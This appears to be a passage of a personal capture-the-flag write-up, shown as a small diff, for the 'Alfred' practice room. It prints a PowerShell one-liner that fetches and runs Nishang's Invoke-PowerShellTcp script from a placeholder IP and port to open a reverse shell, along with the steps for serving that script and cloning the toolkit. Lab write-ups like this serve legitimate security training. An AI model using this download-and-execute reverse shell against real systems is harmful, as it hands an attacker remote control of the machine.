jeffscyberjournal/CTFbin/Alfred.md

 ## Q3: Find a feature of the tool that allows you to execute commands on the underlying system.
 When you find this feature, you can use this command to get the reverse shell on your machine and then run it:

 Answer: not required
 ```
 powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port
 ```
 You first need to download the Powershell script and make it available for the server to download.
 You can do this by creating an http server with python: python3 -m http.server

 Answer: no response required.

 This requires the use of Nishang tool kit mentioned earlier.
-Download, go to shells folder and start a python3 htt.server to allow download from server end.
+Download, go to shells folder and start a python3 -m http.server to allow download from server end.
 ```
 root@ip-10-49-76-50:~# git clone https://github.com/samratashok/nishang
 Cloning into 'nishang'...